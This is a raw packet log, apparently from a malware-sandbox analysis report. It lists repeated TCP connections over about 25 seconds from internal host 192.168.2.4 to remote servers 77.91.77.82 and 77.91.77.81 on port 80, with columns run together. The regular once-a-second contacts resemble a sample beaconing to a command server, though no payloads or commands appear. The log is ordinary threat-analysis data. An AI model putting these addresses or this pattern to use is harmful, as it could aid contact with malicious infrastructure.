                                                                Jul 5, 2024 04:23:54.799326897 CEST4978980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:54.799326897 CEST4978980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:54.805852890 CEST804978977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:55.510452032 CEST804978977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:55.510543108 CEST4978980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:55.511280060 CEST4978980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:55.516062975 CEST804978977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:55.736792088 CEST804978977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:55.736876011 CEST4978980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:55.848270893 CEST4978980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:55.848573923 CEST4979080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:55.853365898 CEST804979077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:55.853378057 CEST804978977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:55.853447914 CEST4978980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:55.853458881 CEST4979080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:55.853626013 CEST4979080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:55.858335018 CEST804979077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:56.572510958 CEST804979077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:56.572606087 CEST4979080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:56.573199034 CEST4979080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:56.578655005 CEST804979077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:56.794910908 CEST804979077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:56.794975996 CEST4979080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:56.910715103 CEST4979080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:56.911010027 CEST4979180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:56.915765047 CEST804979077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:56.915827036 CEST804979177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:56.915831089 CEST4979080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:56.915882111 CEST4979180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:56.915982962 CEST4979180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:56.920825005 CEST804979177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:57.614166975 CEST804979177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:57.614247084 CEST4979180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:57.614829063 CEST4979180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:57.619622946 CEST804979177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:57.832214117 CEST804979177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:57.832300901 CEST4979180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:57.944463015 CEST4979180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:57.944750071 CEST4979280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:57.949526072 CEST804979277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:57.949588060 CEST804979177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:57.949598074 CEST4979280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:57.949635029 CEST4979180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:57.949712038 CEST4979280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:57.954432964 CEST804979277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:58.683682919 CEST804979277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:58.683756113 CEST4979280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:58.685049057 CEST4979280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:58.690000057 CEST804979277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:58.912738085 CEST804979277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:58.912800074 CEST4979280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:59.020500898 CEST4979280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:59.021311998 CEST4979380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:59.025964022 CEST804979277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:59.026027918 CEST4979280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:59.026104927 CEST804979377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:59.026174068 CEST4979380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:59.026324987 CEST4979380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:59.031078100 CEST804979377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:59.726670027 CEST804979377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:59.726727962 CEST4979380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:59.727502108 CEST4979380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:59.732232094 CEST804979377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:59.946022987 CEST804979377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:59.946100950 CEST4979380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:00.051716089 CEST4979380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:00.051884890 CEST4979480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:00.056624889 CEST804979477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:00.056708097 CEST4979480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:00.056740999 CEST804979377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:00.056796074 CEST4979380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:00.056796074 CEST4979480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:00.061520100 CEST804979477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:00.762262106 CEST804979477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:00.762341022 CEST4979480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:00.763000011 CEST4979480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:00.767781973 CEST804979477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:00.985932112 CEST804979477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:00.986006021 CEST4979480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:01.098874092 CEST4979480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:01.099157095 CEST4979580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:01.103909016 CEST804979577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:01.103988886 CEST4979580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:01.103996038 CEST804979477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:01.104039907 CEST4979480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:01.104216099 CEST4979580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:01.109004021 CEST804979577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:01.792587996 CEST804979577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:01.792660952 CEST4979580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:01.797882080 CEST4979580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:01.802651882 CEST804979577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:02.014763117 CEST804979577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:02.014827013 CEST4979580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:02.129476070 CEST4979580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:02.129736900 CEST4979680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:02.134556055 CEST804979677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:02.134613991 CEST804979577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:02.134639978 CEST4979680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:02.134660959 CEST4979580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:02.134763956 CEST4979680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:02.139441967 CEST804979677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:02.836664915 CEST804979677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:02.836715937 CEST4979680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:02.837338924 CEST4979680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:02.842091084 CEST804979677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:03.056818008 CEST804979677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:03.056890011 CEST4979680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:03.160813093 CEST4979680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:03.161082029 CEST4979780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:03.165903091 CEST804979777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:03.165961027 CEST4979780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:03.166094065 CEST4979780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:03.166229010 CEST804979677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:03.166337967 CEST4979680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:03.172394037 CEST804979777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:03.859111071 CEST804979777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:03.859162092 CEST4979780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:03.862282038 CEST4979780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:03.862565994 CEST4979880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:03.864172935 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:24:03.867357016 CEST804979877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:03.867367983 CEST804979777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:03.867424011 CEST4979780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:03.867597103 CEST4979880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:03.867700100 CEST4979880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:03.869054079 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:24:03.869098902 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:24:03.872387886 CEST804979877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:04.585167885 CEST804979877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:04.585226059 CEST4979880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:04.694137096 CEST4979880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:04.694407940 CEST4979980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:04.699354887 CEST804979977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:04.699526072 CEST804979877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:04.699584007 CEST4979880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:04.699593067 CEST4979980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:04.699793100 CEST4979980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:04.704535961 CEST804979977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:04.708050966 CEST4979980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:04.710272074 CEST4980080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:04.716037989 CEST804980077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:04.716104031 CEST4980080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:04.716244936 CEST4980080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:04.721096992 CEST804980077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:05.430541039 CEST804980077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:05.430604935 CEST4980080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:05.537621021 CEST4980080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:05.537929058 CEST4980180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:05.542891026 CEST804980077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:05.542941093 CEST4980080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:05.543059111 CEST804980177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:05.543127060 CEST4980180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:05.543435097 CEST4980180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:05.548213005 CEST804980177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:06.253622055 CEST804980177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:06.253671885 CEST4980180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:06.257396936 CEST4980180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:06.257734060 CEST4980280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:06.263374090 CEST804980277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:06.263850927 CEST4980280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:06.263860941 CEST804980177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:06.263900995 CEST4980180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:06.264303923 CEST4980280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:06.271060944 CEST804980277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:06.987862110 CEST804980277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:06.987922907 CEST4980280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:07.099967957 CEST4980280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:07.100229979 CEST4980380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:07.105113983 CEST804980277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:07.105281115 CEST804980377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:07.105334044 CEST4980280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:07.105364084 CEST4980380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:07.105537891 CEST4980380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:07.110615969 CEST804980377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:07.840920925 CEST804980377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:07.840975046 CEST4980380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:07.844646931 CEST4980380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:07.845074892 CEST4980480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:07.849740028 CEST804980377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:07.849822998 CEST4980380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:07.850125074 CEST804980477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:07.850255013 CEST4980480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:07.850570917 CEST4980480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:07.855895996 CEST804980477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:08.563765049 CEST804980477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:08.563812017 CEST4980480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:08.678689003 CEST4980480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:08.678982019 CEST4980580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:08.683795929 CEST804980577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:08.683815002 CEST804980477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:08.683876038 CEST4980480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:08.683887005 CEST4980580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:08.684226990 CEST4980580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:08.688990116 CEST804980577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:09.383009911 CEST804980577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:09.383076906 CEST4980580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:09.385787964 CEST4980580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:09.386043072 CEST4980680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:09.390777111 CEST804980677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:09.390836000 CEST4980680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:09.391089916 CEST4980680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:09.395883083 CEST804980677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:09.396100998 CEST804980577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:09.396166086 CEST4980580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:10.115803003 CEST804980677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:10.115870953 CEST4980680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:10.225421906 CEST4980680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:10.225734949 CEST4980780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:10.230537891 CEST804980677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:10.230559111 CEST804980777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:10.230585098 CEST4980680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:10.230631113 CEST4980780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:10.230770111 CEST4980780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:10.235759020 CEST804980777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:10.952558994 CEST804980777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:10.952622890 CEST4980780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:10.955018997 CEST4980780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:10.955334902 CEST4980880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:10.960115910 CEST804980777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:10.960127115 CEST804980877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:10.960175991 CEST4980780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:10.960196972 CEST4980880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:11.068753958 CEST4980980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:11.074532032 CEST804980977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:11.074609041 CEST4980980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:11.074727058 CEST4980980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:11.079452991 CEST804980977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:11.784451962 CEST804980977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:11.785339117 CEST4980980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:11.792953014 CEST4980980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:11.797854900 CEST804980977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:12.013389111 CEST804980977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:12.013442039 CEST4980980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:12.136657000 CEST4980980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:12.136909962 CEST4981080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:12.141758919 CEST804981077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:12.141822100 CEST4981080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:12.141823053 CEST804980977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:12.141872883 CEST4980980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:12.142246962 CEST4981080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:12.146991968 CEST804981077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:12.843554020 CEST804981077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:12.843734026 CEST4981080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:12.846513987 CEST4981080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:12.851370096 CEST804981077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:13.068444014 CEST804981077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:13.068507910 CEST4981080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:13.190295935 CEST4981080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:13.190639973 CEST4981180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:13.195446968 CEST804981077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:13.195461988 CEST804981177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:13.195557117 CEST4981080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:13.195596933 CEST4981180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:13.196228981 CEST4981180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:13.200964928 CEST804981177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:13.904289961 CEST804981177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:13.907341003 CEST4981180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:13.909770966 CEST4981180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:13.910053015 CEST4981280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:13.915009975 CEST804981277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:13.915069103 CEST4981280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:13.915337086 CEST804981177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:13.915349007 CEST4981280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:13.915379047 CEST4981180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:13.920614958 CEST804981277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:14.654329062 CEST804981277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:14.654386997 CEST4981280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:14.772835970 CEST4981280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:14.773175001 CEST4981380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:14.777959108 CEST804981377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:14.778036118 CEST804981277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:14.778036118 CEST4981380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:14.778101921 CEST4981280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:14.778239965 CEST4981380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:14.782982111 CEST804981377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:15.479491949 CEST804981377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:15.479669094 CEST4981380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:15.482222080 CEST4981380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:15.482570887 CEST4981480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:15.487323999 CEST804981377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:15.487364054 CEST4981380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:15.487373114 CEST804981477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:15.487628937 CEST4981480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:15.487858057 CEST4981480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:15.492588997 CEST804981477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:16.181190014 CEST804981477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:16.181237936 CEST4981480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:16.310266972 CEST4981480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:16.310568094 CEST4981580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:16.315314054 CEST804981477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:16.315386057 CEST4981480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:16.315414906 CEST804981577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:16.315480947 CEST4981580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:16.315742016 CEST4981580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:16.320449114 CEST804981577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:17.025351048 CEST804981577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:17.025415897 CEST4981580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:17.028359890 CEST4981580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:17.028701067 CEST4981680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:17.033456087 CEST804981677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:17.033518076 CEST804981577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:17.033591986 CEST4981580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:17.033607006 CEST4981680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:17.033828974 CEST4981680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:17.038564920 CEST804981677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:17.765649080 CEST804981677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:17.765696049 CEST4981680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:17.882724047 CEST4981680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:17.883050919 CEST4981780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:17.887821913 CEST804981777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:17.887878895 CEST4981780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:17.887897015 CEST804981677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:17.887942076 CEST4981680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:17.888556004 CEST4981780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:17.893330097 CEST804981777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:18.598496914 CEST804981777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:18.598575115 CEST4981780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:18.601825953 CEST4981780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:18.602076054 CEST4981880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:18.606858969 CEST804981877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:18.606930017 CEST4981880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:18.607099056 CEST804981777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:18.607115030 CEST4981880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:18.607145071 CEST4981780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:18.611845970 CEST804981877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:19.328160048 CEST804981877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:19.328308105 CEST4981880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:19.447278976 CEST4981880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:19.447859049 CEST4981980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:19.452449083 CEST804981877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:19.452498913 CEST4981880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:19.452675104 CEST804981977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:19.452804089 CEST4981980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:19.453387976 CEST4981980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:19.458200932 CEST804981977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:20.178311110 CEST804981977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:20.178375006 CEST4981980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:20.181520939 CEST4981980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:20.181797981 CEST4982080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:20.188143969 CEST804982077.91.77.82192.168.2.4
